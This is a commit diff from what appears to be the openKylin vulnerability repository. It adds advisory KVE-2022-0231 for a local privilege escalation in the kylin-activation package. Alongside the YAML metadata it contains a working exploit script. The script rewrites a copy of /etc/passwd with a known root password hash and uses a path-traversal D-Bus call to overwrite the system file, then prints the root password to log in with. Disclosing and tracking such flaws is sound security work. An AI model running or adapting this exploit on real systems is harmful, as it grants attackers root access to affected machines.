add KVE-2022-0231

2022-11-16 20:39:08 +08:00 · 2022-11-16 20:39:08 +08:00 · b69c9bda90
parent d18a20f6e6
commit b69c9bda90
3 changed files with 31 additions and 1 deletions
--- a/kve/kylin-activation/2022/KVE-2022-0231/KVE-2022-0231_exp.sh
+++ b/kve/kylin-activation/2022/KVE-2022-0231/KVE-2022-0231_exp.sh
@ -0,0 +1,8 @@
+echo "[*] Trying to overwrite passwd file ..."
+cp /etc/passwd /tmp/passwd
+sed -i 's/root:x:0:0:root/root:\$1\$nrDGqnHa\$EhGl0D2EBPmnQTC2hGvgl.:0:0:root/g' /tmp/passwd
+dbus-send --system --dest=org.freedesktop.activation /org/freedesktop/activation org.freedesktop.activation.interface.import_auth_file string:../tmp/passwd
+sleep 1
+dbus-send --system --dest=org.freedesktop.activation /org/freedesktop/activation org.freedesktop.activation.interface.import_auth_file string:../tmp/passwd
+sleep 1
+echo '[*] Try login with root / 123qwe!@#QWE'
--- a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml
+++ b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml
@ -0,0 +1,20 @@
+id: KVE-2022-0231
+source: openKylin Community
+info:
+  name: kylin-activation软件包是用于授权验证与激活的组件。
+  severity: high
+  description: |
+    该软件包未对导入文件操作的合法性进行严格限制，因此造成系统配置文件所在目录被导入非法配置文件，从而造成普通用户本地权限提升。
+  scope-of-influence:
+    kylin-activation < 1.3.11-23
+    kylin-activation < 1.30.10-5.p23
+  reference:
+    - 
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: None
+    cwe-id: None
+    cnvd-id: None
+    kve-id: KVE-2022-0231
+  tags: kve2022,dbus
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@ -45,4 +45,6 @@ kve:
  youker-assistant:
    - KVE-2022-0205
  kylin-display-switch:
-    - KVE-2022-0206
+    - KVE-2022-0206
+  kylin-activation:
+    - KVE-2022-0231